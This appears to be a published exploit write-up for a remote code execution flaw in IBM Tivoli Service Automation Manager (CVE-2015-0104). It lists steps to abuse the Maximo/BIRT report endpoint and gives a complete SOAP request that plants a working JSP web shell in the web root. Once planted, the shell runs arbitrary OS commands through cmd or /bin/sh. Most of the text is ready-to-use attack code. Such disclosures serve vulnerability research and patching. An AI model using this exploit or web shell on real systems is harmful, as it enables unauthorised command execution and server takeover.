|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70  |  # Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution # Date: 12\12\2014 # Exploit Author: Jakub Palaczynski # Vendor Homepage: http://www.ibm.com/ # Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4 # VU/CVE: VU#782708, CVE-2015-0104 1. Create report 2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum= 3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request: POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1 Host: site Content-Length: xxx <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%>  <%  try { String cmd;  String[] cmdarr;  String OS = System.getProperty("os.name");  if (request.getParameter("cmd") != null) {  cmd = new String (request.getParameter("cmd"));  if (OS.startsWith("Windows")) {   cmdarr = new String [] {"cmd", "/C", cmd};  }  else {   cmdarr = new String [] {"/bin/sh", "-c", cmd};  }  Process p = Runtime.getRuntime().exec(cmdarr);  OutputStream os = p.getOutputStream();  InputStream in = p.getInputStream();  DataInputStream dis = new DataInputStream(in);  String disr = dis.readLine();  while ( disr != null ) {  out.println(disr);  disr = dis.readLine();  }  }  } catch (Exception e) { e.printStackTrace();} 
%>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope> 4. The web shell is now ready to use at the path specified in the __document parameter's value.